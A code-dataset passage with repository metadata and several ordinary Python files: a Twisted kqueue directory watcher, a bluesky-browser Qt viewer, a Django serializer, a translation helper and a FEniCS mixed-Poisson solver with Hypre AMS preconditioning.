DalavanCloud/ccs-twistedextensions
|
2c4046df88873dcf33fba7840ed90e4238dcbec7
|
[
"Apache-2.0"
] | 20
|
2016-08-17T06:51:00.000Z
|
2022-03-26T11:55:56.000Z
|
##
# Copyright (c) 2013-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Watch the availability of a file system directory
"""
import os
from zope.interface import Interface
from twisted.internet import reactor
from twisted.python.log import Logger
try:
from select import (
kevent, KQ_FILTER_VNODE, KQ_EV_ADD, KQ_EV_ENABLE,
KQ_EV_CLEAR, KQ_NOTE_DELETE, KQ_NOTE_RENAME, KQ_EV_EOF
)
kqueueSupported = True
except ImportError:
# kqueue not supported on this platform
kqueueSupported = False
class IDirectoryChangeListenee(Interface):
"""
A delegate of DirectoryChangeListener
"""
def disconnected():
"""
The directory has been unmounted
"""
def deleted():
"""
The directory has been deleted
"""
def renamed():
"""
The directory has been renamed
"""
def connectionLost(reason):
"""
The file descriptor has been closed
"""
# TODO: better way to tell if reactor is kqueue or not
if kqueueSupported and hasattr(reactor, "_doWriteOrRead"):
def patchReactor(reactor):
# Wrap _doWriteOrRead to support KQ_FILTER_VNODE
origDoWriteOrRead = reactor._doWriteOrRead
def _doWriteOrReadOrVNodeEvent(selectable, fd, event):
origDoWriteOrRead(selectable, fd, event)
if event.filter == KQ_FILTER_VNODE:
selectable.vnodeEventHappened(event)
reactor._doWriteOrRead = _doWriteOrReadOrVNodeEvent
patchReactor(reactor)
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
if evt.flags & KQ_EV_EOF:
self._listenee.disconnected()
if evt.fflags & KQ_NOTE_DELETE:
self._listenee.deleted()
if evt.fflags & KQ_NOTE_RENAME:
self._listenee.renamed()
def startListening(self):
ke = kevent(self._fd, filter=KQ_FILTER_VNODE,
flags=(KQ_EV_ADD | KQ_EV_ENABLE | KQ_EV_CLEAR),
fflags=KQ_NOTE_DELETE | KQ_NOTE_RENAME)
self._reactor._kq.control([ke], 0, None)
self._reactor._selectables[self._fd] = self
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
else:
# TODO: implement this for systems without kqueue support:
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
pass
def startListening(self):
pass
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
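# Typical wiring (a sketch; MyListenee is a hypothetical
# IDirectoryChangeListenee implementation, not part of this module):
#   listener = DirectoryChangeListener(reactor, '/var/spool/foo', MyListenee())
#   listener.startListening()
#   reactor.run()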
| 29.932099
| 76
| 0.622603
|
import os
from zope.interface import Interface
from twisted.internet import reactor
from twisted.python.log import Logger
try:
from select import (
kevent, KQ_FILTER_VNODE, KQ_EV_ADD, KQ_EV_ENABLE,
KQ_EV_CLEAR, KQ_NOTE_DELETE, KQ_NOTE_RENAME, KQ_EV_EOF
)
kqueueSupported = True
except ImportError:
kqueueSupported = False
class IDirectoryChangeListenee(Interface):
    def disconnected():
        pass
    def deleted():
        pass
    def renamed():
        pass
    def connectionLost(reason):
        pass
if kqueueSupported and hasattr(reactor, "_doWriteOrRead"):
def patchReactor(reactor):
origDoWriteOrRead = reactor._doWriteOrRead
def _doWriteOrReadOrVNodeEvent(selectable, fd, event):
origDoWriteOrRead(selectable, fd, event)
if event.filter == KQ_FILTER_VNODE:
selectable.vnodeEventHappened(event)
reactor._doWriteOrRead = _doWriteOrReadOrVNodeEvent
patchReactor(reactor)
class DirectoryChangeListener(Logger, object):
def __init__(self, reactor, dirname, listenee):
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
if evt.flags & KQ_EV_EOF:
self._listenee.disconnected()
if evt.fflags & KQ_NOTE_DELETE:
self._listenee.deleted()
if evt.fflags & KQ_NOTE_RENAME:
self._listenee.renamed()
def startListening(self):
ke = kevent(self._fd, filter=KQ_FILTER_VNODE,
flags=(KQ_EV_ADD | KQ_EV_ENABLE | KQ_EV_CLEAR),
fflags=KQ_NOTE_DELETE | KQ_NOTE_RENAME)
self._reactor._kq.control([ke], 0, None)
self._reactor._selectables[self._fd] = self
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
else:
class DirectoryChangeListener(Logger, object):
"""
Listens for the removal, renaming, or general unavailability of a
given directory, and lets a delegate listenee know about them.
"""
def __init__(self, reactor, dirname, listenee):
"""
@param reactor: the reactor
@param dirname: the full path to the directory to watch; it must
already exist
@param listenee: the delegate to call
@type listenee: IDirectoryChangeListenee
"""
self._reactor = reactor
self._fd = os.open(dirname, os.O_RDONLY)
self._dirname = dirname
self._listenee = listenee
def logPrefix(self):
return repr(self._dirname)
def fileno(self):
return self._fd
def vnodeEventHappened(self, evt):
pass
def startListening(self):
pass
def connectionLost(self, reason):
os.close(self._fd)
self._listenee.connectionLost(reason)
| true
| true
|
1c44647222191c391e494faa2f304c10eae6fbf7
| 9,471
|
py
|
Python
|
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
bluesky_browser/viewer/viewer.py
|
EliotGann/bluesky-browser
|
e86e259c21d6dbeb781f32de8485f706b3b17bdc
|
[
"BSD-3-Clause"
] | null | null | null |
import collections
import enum
from functools import partial
import itertools
import logging
from event_model import RunRouter, Filler
from intake_bluesky.core import parse_handler_registry
from qtpy.QtCore import Signal, QThread
from qtpy.QtWidgets import (
QAction,
QActionGroup,
QInputDialog,
QVBoxLayout,
)
from traitlets.traitlets import List, Dict, DottedObjectName
from .header_tree import HeaderTreeFactory
from .baseline import BaselineFactory
from .figures import FigureManager
from ..utils import (
MoveableTabWidget,
ConfigurableMoveableTabContainer,
ConfigurableQTabWidget,
load_config)
log = logging.getLogger('bluesky_browser')
class Viewer(ConfigurableMoveableTabContainer):
"""
Contains multiple TabbedViewingAreas
"""
tab_titles = Signal([tuple])
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self._run_to_tabs = collections.defaultdict(list)
self._title_to_tab = {}
self._tabs_from_streaming = []
self._overplot = OverPlotState.individual_tab
self._overplot_target = None
self._live_enabled = False
self._live_run_router = RunRouter([self.route_live_stream])
self._containers = [TabbedViewingArea(self, menuBar=menuBar) for _ in range(2)]
layout = QVBoxLayout()
for container in self._containers:
layout.addWidget(container)
self.setLayout(layout)
overplot_group = QActionGroup(self)
self.off = QAction('&Off', self)
self.off.setStatusTip('Drop streaming data.')
self.individual_tab = QAction('&New Tab', self)
self.individual_tab.setStatusTip('Open a new viewer tab for each Run.')
self.latest_live = QAction('&Latest Live Tab', self)
self.latest_live.setStatusTip('Attempt to overplot on the most recent live Run.')
self.fixed = QAction('&Fixed Tab...', self)
self.fixed.setStatusTip('Attempt to overplot on a specific tab.')
self.fixed.setEnabled(False)
overplot_group.addAction(self.off)
overplot_group.addAction(self.individual_tab)
overplot_group.addAction(self.latest_live)
overplot_group.addAction(self.fixed)
for action in overplot_group.actions():
action.setCheckable(True)
overplot_group.setExclusive(True)
self.off.setChecked(True)
overplot_menu = menuBar().addMenu('&Streaming')
overplot_menu.addActions(overplot_group.actions())
self.off.triggered.connect(self.disable_live)
self.individual_tab.triggered.connect(partial(self.set_overplot_state, OverPlotState.individual_tab))
self.latest_live.triggered.connect(partial(self.set_overplot_state, OverPlotState.latest_live))
def set_overplot_target():
item, ok = QInputDialog.getItem(
self, "Select Tab", "Tab", tuple(self._title_to_tab), 0, False)
if not ok:
# Abort and fallback to Off. Would be better to fall back to
# previous state (which could be latest_live) but it's not
# clear how to know what that state was.
self.off.setChecked(True)
return
self.set_overplot_state(OverPlotState.fixed)
self._overplot_target = item
self.fixed.triggered.connect(set_overplot_target)
def enable_live(self):
self._live_enabled = True
def disable_live(self):
self._live_enabled = False
def consumer(self, item):
"""Slot that receives (name, doc) and unpacks it into RunRouter."""
self._live_run_router(*item)
def route_live_stream(self, name, start_doc):
"""Create or choose a Viewer to receive this Run."""
if not self._live_enabled:
log.debug("Streaming Run ignored because Streaming is disabled.")
return [], []
self.fixed.setEnabled(True)
target_area = self._containers[0]
uid = start_doc['uid']
if self._overplot == OverPlotState.individual_tab:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
elif self._overplot == OverPlotState.fixed:
viewer = self._title_to_tab[self._overplot_target]
elif self._overplot == OverPlotState.latest_live:
if self._tabs_from_streaming:
viewer = self._tabs_from_streaming[-1]
else:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
self._run_to_tabs[uid].append(viewer)
viewer.run_router('start', start_doc)
return [viewer.run_router], []
def show_entries(self, target, entries):
self.fixed.setEnabled(True)
target_area = self._containers[0]
if not target:
# Add new Viewer tab.
viewer = RunViewer()
if len(entries) == 1:
entry, = entries
uid = entry().metadata['start']['uid']
tab_title = uid[:8]
else:
tab_title = self.get_title()
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
else:
viewer = self._title_to_tab[target]
for entry in entries:
viewer.load_entry(entry)
uid = entry().metadata['start']['uid']
self._run_to_tabs[uid].append(viewer)
# TODO Make last entry in the list the current widget.
def get_title(self):
for i in itertools.count(1):
title = f'Group {i}'
if title in self._title_to_tab:
continue
return title
def set_overplot_state(self, state):
self.enable_live()
log.debug('Overplot state is %s', state)
self._overplot = state
def close_run_viewer(self, widget):
try:
self._tabs_from_streaming.remove(widget)
except ValueError:
pass
for uid in widget.uids:
self._run_to_tabs[uid].remove(widget)
for title, tab in list(self._title_to_tab.items()):
if tab == widget:
del self._title_to_tab[title]
self.tab_titles.emit(tuple(self._title_to_tab))
if title == self._overplot_target:
self.set_overplot_state(OverPlotState.off)
if not self._title_to_tab:
self.fixed.setEnabled(False)
class TabbedViewingArea(MoveableTabWidget):
"""
Contains RunViewers
"""
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self.setTabsClosable(True)
self.tabCloseRequested.connect(self.close_tab)
def close_tab(self, index):
widget = self.widget(index)
self.parent().close_run_viewer(widget)
self.removeTab(index)
class RunViewer(ConfigurableQTabWidget):
"""
    Contains tabs showing various views on the data from one Run.
"""
factories = List([HeaderTreeFactory,
BaselineFactory,
FigureManager], config=True)
handler_registry = Dict(DottedObjectName(), config=True)
def __init__(self, *args, **kwargs):
self.update_config(load_config())
super().__init__(*args, **kwargs)
self._entries = []
self._uids = []
self._active_loaders = set()
def filler_factory(name, doc):
filler = Filler(parse_handler_registry(self.handler_registry))
filler('start', doc)
return [filler], []
self.run_router = RunRouter(
[filler_factory] +
[factory(self.addTab) for factory in self.factories])
@property
def entries(self):
return self._entries
@property
def uids(self):
return self._uids
def load_entry(self, entry):
"Load all documents from intake and push them through the RunRouter."
self._entries.append(entry)
datasource = entry()
self._uids.append(datasource.metadata['start']['uid'])
entry_loader = EntryLoader(entry, self._active_loaders)
entry_loader.signal.connect(self.run_router)
entry_loader.start()
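# Usage sketch ('catalog' is a hypothetical intake catalog; only load_entry
# itself belongs to this module):
#   viewer = RunViewer()
#   viewer.load_entry(catalog['some_run_uid'])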
class EntryLoader(QThread):
signal = Signal([str, dict])
def __init__(self, entry, loaders, *args, **kwargs):
self.entry = entry
self.loaders = loaders
self.loaders.add(self) # Keep it safe from gc.
super().__init__(*args, **kwargs)
def run(self):
for name, doc in self.entry().read_canonical():
self.signal.emit(name, doc)
self.loaders.remove(self)
class OverPlotState(enum.Enum):
    # 'off' is required by Viewer.close_run_viewer, which falls back to it.
    off = enum.auto()
    individual_tab = enum.auto()
    latest_live = enum.auto()
    fixed = enum.auto()
| 35.339552
| 109
| 0.629606
|
import collections
import enum
from functools import partial
import itertools
import logging
from event_model import RunRouter, Filler
from intake_bluesky.core import parse_handler_registry
from qtpy.QtCore import Signal, QThread
from qtpy.QtWidgets import (
QAction,
QActionGroup,
QInputDialog,
QVBoxLayout,
)
from traitlets.traitlets import List, Dict, DottedObjectName
from .header_tree import HeaderTreeFactory
from .baseline import BaselineFactory
from .figures import FigureManager
from ..utils import (
MoveableTabWidget,
ConfigurableMoveableTabContainer,
ConfigurableQTabWidget,
load_config)
log = logging.getLogger('bluesky_browser')
class Viewer(ConfigurableMoveableTabContainer):
tab_titles = Signal([tuple])
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self._run_to_tabs = collections.defaultdict(list)
self._title_to_tab = {}
self._tabs_from_streaming = []
self._overplot = OverPlotState.individual_tab
self._overplot_target = None
self._live_enabled = False
self._live_run_router = RunRouter([self.route_live_stream])
self._containers = [TabbedViewingArea(self, menuBar=menuBar) for _ in range(2)]
layout = QVBoxLayout()
for container in self._containers:
layout.addWidget(container)
self.setLayout(layout)
overplot_group = QActionGroup(self)
self.off = QAction('&Off', self)
self.off.setStatusTip('Drop streaming data.')
self.individual_tab = QAction('&New Tab', self)
self.individual_tab.setStatusTip('Open a new viewer tab for each Run.')
self.latest_live = QAction('&Latest Live Tab', self)
self.latest_live.setStatusTip('Attempt to overplot on the most recent live Run.')
self.fixed = QAction('&Fixed Tab...', self)
self.fixed.setStatusTip('Attempt to overplot on a specific tab.')
self.fixed.setEnabled(False)
overplot_group.addAction(self.off)
overplot_group.addAction(self.individual_tab)
overplot_group.addAction(self.latest_live)
overplot_group.addAction(self.fixed)
for action in overplot_group.actions():
action.setCheckable(True)
overplot_group.setExclusive(True)
self.off.setChecked(True)
overplot_menu = menuBar().addMenu('&Streaming')
overplot_menu.addActions(overplot_group.actions())
self.off.triggered.connect(self.disable_live)
self.individual_tab.triggered.connect(partial(self.set_overplot_state, OverPlotState.individual_tab))
self.latest_live.triggered.connect(partial(self.set_overplot_state, OverPlotState.latest_live))
def set_overplot_target():
item, ok = QInputDialog.getItem(
self, "Select Tab", "Tab", tuple(self._title_to_tab), 0, False)
if not ok:
# clear how to know what that state was.
self.off.setChecked(True)
return
self.set_overplot_state(OverPlotState.fixed)
self._overplot_target = item
self.fixed.triggered.connect(set_overplot_target)
def enable_live(self):
self._live_enabled = True
def disable_live(self):
self._live_enabled = False
def consumer(self, item):
self._live_run_router(*item)
def route_live_stream(self, name, start_doc):
if not self._live_enabled:
log.debug("Streaming Run ignored because Streaming is disabled.")
return [], []
self.fixed.setEnabled(True)
target_area = self._containers[0]
uid = start_doc['uid']
if self._overplot == OverPlotState.individual_tab:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
elif self._overplot == OverPlotState.fixed:
viewer = self._title_to_tab[self._overplot_target]
elif self._overplot == OverPlotState.latest_live:
if self._tabs_from_streaming:
viewer = self._tabs_from_streaming[-1]
else:
viewer = RunViewer()
tab_title = uid[:8]
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
self._tabs_from_streaming.append(viewer)
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
self._run_to_tabs[uid].append(viewer)
viewer.run_router('start', start_doc)
return [viewer.run_router], []
def show_entries(self, target, entries):
self.fixed.setEnabled(True)
target_area = self._containers[0]
if not target:
# Add new Viewer tab.
viewer = RunViewer()
if len(entries) == 1:
entry, = entries
uid = entry().metadata['start']['uid']
tab_title = uid[:8]
else:
tab_title = self.get_title()
index = target_area.addTab(viewer, tab_title)
self._title_to_tab[tab_title] = viewer
target_area.setCurrentIndex(index)
self.tab_titles.emit(tuple(self._title_to_tab))
else:
viewer = self._title_to_tab[target]
for entry in entries:
viewer.load_entry(entry)
uid = entry().metadata['start']['uid']
self._run_to_tabs[uid].append(viewer)
# TODO Make last entry in the list the current widget.
def get_title(self):
for i in itertools.count(1):
title = f'Group {i}'
if title in self._title_to_tab:
continue
return title
def set_overplot_state(self, state):
self.enable_live()
log.debug('Overplot state is %s', state)
self._overplot = state
def close_run_viewer(self, widget):
try:
self._tabs_from_streaming.remove(widget)
except ValueError:
pass
for uid in widget.uids:
self._run_to_tabs[uid].remove(widget)
for title, tab in list(self._title_to_tab.items()):
if tab == widget:
del self._title_to_tab[title]
self.tab_titles.emit(tuple(self._title_to_tab))
if title == self._overplot_target:
self.set_overplot_state(OverPlotState.off)
if not self._title_to_tab:
self.fixed.setEnabled(False)
class TabbedViewingArea(MoveableTabWidget):
def __init__(self, *args, menuBar, **kwargs):
super().__init__(*args, **kwargs)
self.setTabsClosable(True)
self.tabCloseRequested.connect(self.close_tab)
def close_tab(self, index):
widget = self.widget(index)
self.parent().close_run_viewer(widget)
self.removeTab(index)
class RunViewer(ConfigurableQTabWidget):
factories = List([HeaderTreeFactory,
BaselineFactory,
FigureManager], config=True)
handler_registry = Dict(DottedObjectName(), config=True)
def __init__(self, *args, **kwargs):
self.update_config(load_config())
super().__init__(*args, **kwargs)
self._entries = []
self._uids = []
self._active_loaders = set()
def filler_factory(name, doc):
filler = Filler(parse_handler_registry(self.handler_registry))
filler('start', doc)
return [filler], []
self.run_router = RunRouter(
[filler_factory] +
[factory(self.addTab) for factory in self.factories])
@property
def entries(self):
return self._entries
@property
def uids(self):
return self._uids
def load_entry(self, entry):
self._entries.append(entry)
datasource = entry()
self._uids.append(datasource.metadata['start']['uid'])
entry_loader = EntryLoader(entry, self._active_loaders)
entry_loader.signal.connect(self.run_router)
entry_loader.start()
class EntryLoader(QThread):
signal = Signal([str, dict])
def __init__(self, entry, loaders, *args, **kwargs):
self.entry = entry
self.loaders = loaders
self.loaders.add(self) # Keep it safe from gc.
super().__init__(*args, **kwargs)
def run(self):
for name, doc in self.entry().read_canonical():
self.signal.emit(name, doc)
self.loaders.remove(self)
class OverPlotState(enum.Enum):
    off = enum.auto()
    individual_tab = enum.auto()
    latest_live = enum.auto()
    fixed = enum.auto()
| true
| true
|
1c44648c4b45e9fcff2f7d4448d645a78980e555
| 261
|
py
|
Python
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 32
|
2017-02-22T13:38:38.000Z
|
2022-03-31T23:29:54.000Z
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 694
|
2017-02-15T23:09:52.000Z
|
2022-03-31T23:16:07.000Z
|
apps/splash/api/serializers.py
|
Kpaubert/onlineweb4
|
9ac79f163bc3a816db57ffa8477ea88770d97807
|
[
"MIT"
] | 35
|
2017-09-02T21:13:09.000Z
|
2022-02-21T11:30:30.000Z
|
from rest_framework.serializers import ModelSerializer
from apps.splash.models import SplashEvent
class SplashEventSerializer(ModelSerializer):
class Meta:
model = SplashEvent
fields = ("id", "title", "content", "start_time", "end_time")
| 26.1
| 69
| 0.731801
|
from rest_framework.serializers import ModelSerializer
from apps.splash.models import SplashEvent
class SplashEventSerializer(ModelSerializer):
class Meta:
model = SplashEvent
fields = ("id", "title", "content", "start_time", "end_time")
| true
| true
|
1c4465651a88a27dd1226447cce30e3be39112c4
| 687
|
py
|
Python
|
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | null | null | null |
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | 5
|
2021-02-10T02:41:20.000Z
|
2022-03-12T00:56:56.000Z
|
src/cms/utils/translation_utils.py
|
mckinly/cms-django
|
c9995a3bfab6ee2d02f2406a7f83cf91b7ccfcca
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains helpers for the translation process.
"""
from django.utils.text import format_lazy
def ugettext_many_lazy(*strings):
"""
This function is a wrapper for :func:`django.utils.text.format_lazy` for the special case that the given strings
should be concatenated with a space in between. This is useful for splitting lazy translated strings by sentences
which improves the translation memory.
    :param strings: A list of lazy translated strings which should be concatenated
:type strings: list
:return: A lazy formatted string
:rtype: str
"""
fstring = ("{} " * len(strings)).strip()
return format_lazy(fstring, *strings)
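# Usage sketch (the strings are hypothetical; gettext_lazy is the usual source):
#   from django.utils.translation import gettext_lazy as _
#   msg = ugettext_many_lazy(_("File saved."), _("Publishing may take a minute."))
#   str(msg)  # -> "File saved. Publishing may take a minute."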
| 32.714286
| 117
| 0.726346
|
from django.utils.text import format_lazy
def ugettext_many_lazy(*strings):
fstring = ("{} " * len(strings)).strip()
return format_lazy(fstring, *strings)
| true
| true
|
1c4465c58914ba00924c3db332f745c7350c02b5
| 5,321
|
py
|
Python
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 10
|
2017-06-22T21:05:17.000Z
|
2020-09-25T08:36:59.000Z
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 2
|
2018-04-14T08:43:59.000Z
|
2018-09-19T14:51:46.000Z
|
sandbox/mixed_poisson_hypre_2d.py
|
MiroK/fenics_ii
|
58c41f0e8dba720962830395851e081b057269cc
|
[
"MIT"
] | 6
|
2018-04-13T20:33:53.000Z
|
2020-09-25T08:37:01.000Z
|
from dolfin import *
from petsc4py import PETSc
from mpi4py import MPI as pyMPI
from sympy.printing import ccode
import sympy as sp
import numpy as np
from block import block_assemble, block_mat
from block.iterative import MinRes
from block.algebraic.petsc import LU, LumpedInvDiag
from block.block_base import block_base
# MMS utils
def expr_body(expr, **kwargs):
if not hasattr(expr, '__len__'):
# Defined in terms of some coordinates
xyz = set(sp.symbols('x[0], x[1], x[2]'))
xyz_used = xyz & expr.free_symbols
assert xyz_used <= xyz
        # Expression params which still need default values (compare symbols
        # by name, since sympy Symbols never hash equal to plain strings)
        params = set(map(str, expr.free_symbols - xyz_used)) - set(kwargs.keys())
# Body
expr = ccode(expr).replace('M_PI', 'pi')
        # Default the remaining params to zero
        kwargs.update(dict((p, 0.) for p in params))
# Convert
return expr
# Vectors, Matrices as iterables of expressions
else:
return [expr_body(e, **kwargs) for e in expr]
def as_expression(expr, degree=4, **kwargs):
'''Turns sympy expressions to Dolfin expressions.'''
return Expression(expr_body(expr), degree=degree, **kwargs)
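# Illustrative sketch (hypothetical symbol; relies only on the helpers above):
#   x0 = sp.Symbol('x[0]')
#   f = as_expression(sp.sin(2*sp.pi*x0))
#   # expr_body yields the C string 'sin(2*pi*x[0])', which dolfin's
#   # Expression compiles with degree=4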
def vec(x):
return as_backend_type(x).vec()
def mat(A):
return as_backend_type(A).mat()
class HypreAMS(block_base):
'''AMG auxiliary space preconditioner for Hdiv(0) norm'''
def __init__(self, V, hdiv0=False, bc=None):
# FIXME: lift
assert V.ufl_element().family() == 'Raviart-Thomas'
assert V.ufl_element().degree() == 1
mesh = V.mesh()
assert mesh.geometry().dim() == 2
sigma, tau = TrialFunction(V), TestFunction(V)
a = inner(div(sigma), div(tau))*dx
if not hdiv0:
a += inner(sigma, tau)*dx
f = Constant(np.zeros(V.ufl_element().value_shape()))
L = inner(tau, f)*dx
A, _ = assemble_system(a, L, bc)
# AMS setup
Q = FunctionSpace(mesh, 'CG', 1)
G = DiscreteOperators.build_gradient(V, Q)
pc = PETSc.PC().create(mesh.mpi_comm().tompi4py())
pc.setType('hypre')
pc.setHYPREType('ams')
# Attach gradient
pc.setHYPREDiscreteGradient(mat(G))
# Constant nullspace (in case not mass and bcs)
constants = [vec(interpolate(c, V).vector())
for c in (Constant((1, 0)), Constant((0, 1)))]
pc.setHYPRESetEdgeConstantVectors(*constants)
        # NOTE: the mass term is accounted for automatically by Hypre
# unless pc.setPoissonBetaMatrix(None)
if hdiv0: pc.setHYPRESetBetaPoissonMatrix(None)
pc.setOperators(mat(A))
# FIXME: some defaults
pc.setFromOptions()
pc.setUp()
self.pc = pc
self.A = A # For creating vec
def matvec(self, b):
if not isinstance(b, GenericVector):
return NotImplemented
x = self.A.create_vec(dim=1)
if len(x) != len(b):
raise RuntimeError(
'incompatible dimensions for PETSc matvec, %d != %d'%(len(x),len(b)))
self.pc.apply(vec(b), vec(x))
return x
def main(n):
'''Solves grad-div problem in 2d with HypreAMS preconditioning'''
# Exact solution
x, y = sp.symbols('x[0] x[1]')
u = sp.sin(pi*x*(1-x)*y*(1-y))
sp_div = lambda f: f[0].diff(x, 1) + f[1].diff(y, 1)
sp_grad = lambda f: sp.Matrix([f.diff(x, 1), f.diff(y, 1)])
sigma = sp_grad(u)
f = -sp_div(sigma) + u
sigma_expr, u_expr, f_expr = list(map(as_expression, (sigma, u, f)))
# The discrete problem
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'RT', 1)
Q = FunctionSpace(mesh, 'DG', 0)
W = (V, Q)
sigma, u = list(map(TrialFunction, W))
tau, v = list(map(TestFunction, W))
a00 = inner(sigma, tau)*dx
a01 = inner(div(tau), u)*dx
a10 = inner(div(sigma), v)*dx
a11 = -inner(u, v)*dx
L0 = inner(Constant((0, 0)), tau)*dx
L1 = inner(-f_expr, v)*dx
AA = block_assemble([[a00, a01], [a10, a11]])
bb = block_assemble([L0, L1])
# b00 = inner(sigma, tau)*dx + inner(div(sigma), div(tau))*dx
# B00 = LU(assemble(b00))
B00 = HypreAMS(V)
b11 = inner(u, v)*dx
B11 = LumpedInvDiag(assemble(b11))
BB = block_mat([[B00, 0], [0, B11]])
AAinv = MinRes(AA, precond=BB, tolerance=1e-10, maxiter=500, show=2)
# Compute solution
sigma_h, u_h = AAinv * bb
sigma_h, u_h = Function(V, sigma_h), Function(Q, u_h)
niters = len(AAinv.residuals) - 1
# error = sqrt(errornorm(sigma_expr, sigma_h, 'Hdiv', degree_rise=1)**2 +
# errornorm(u_expr, u_h, 'L2', degree_rise=1)**2)
hmin = mesh.mpi_comm().tompi4py().allreduce(mesh.hmin(), pyMPI.MIN)
error = 1.
return hmin, V.dim()+Q.dim(), niters, error
# --------------------------------------------------------------------------
if __name__ == '__main__':
msg = 'hmin = %g #dofs = %d, niters = %d, error = %g(%.2f)'
h0, error0 = None, None
for n in (8, 16, 32, 64, 128, 256, 512, 1024):
h, ndofs, niters, error = main(n)
if error0 is not None:
rate = ln(error/error0)/ln(h/h0)
else:
rate = -1
h0, error0 = h, error
print((msg % (h, ndofs, niters, error, rate)))
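# Typical invocation (assumes a FEniCS build with petsc4py, cbc.block and a
# hypre-enabled PETSc; iteration counts will vary with the mesh):
#   $ python mixed_poisson_hypre_2d.py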
| 28.454545
| 85
| 0.577147
|
from dolfin import *
from petsc4py import PETSc
from mpi4py import MPI as pyMPI
from sympy.printing import ccode
import sympy as sp
import numpy as np
from block import block_assemble, block_mat
from block.iterative import MinRes
from block.algebraic.petsc import LU, LumpedInvDiag
from block.block_base import block_base
def expr_body(expr, **kwargs):
if not hasattr(expr, '__len__'):
xyz = set(sp.symbols('x[0], x[1], x[2]'))
xyz_used = xyz & expr.free_symbols
assert xyz_used <= xyz
params = (expr.free_symbols - xyz_used) & set(kwargs.keys())
expr = ccode(expr).replace('M_PI', 'pi')
kwargs.update(dict((str(p), 0.) for p in params))
return expr
else:
return [expr_body(e, **kwargs) for e in expr]
def as_expression(expr, degree=4, **kwargs):
return Expression(expr_body(expr), degree=degree, **kwargs)
def vec(x):
return as_backend_type(x).vec()
def mat(A):
return as_backend_type(A).mat()
class HypreAMS(block_base):
def __init__(self, V, hdiv0=False, bc=None):
assert V.ufl_element().family() == 'Raviart-Thomas'
assert V.ufl_element().degree() == 1
mesh = V.mesh()
assert mesh.geometry().dim() == 2
sigma, tau = TrialFunction(V), TestFunction(V)
a = inner(div(sigma), div(tau))*dx
if not hdiv0:
a += inner(sigma, tau)*dx
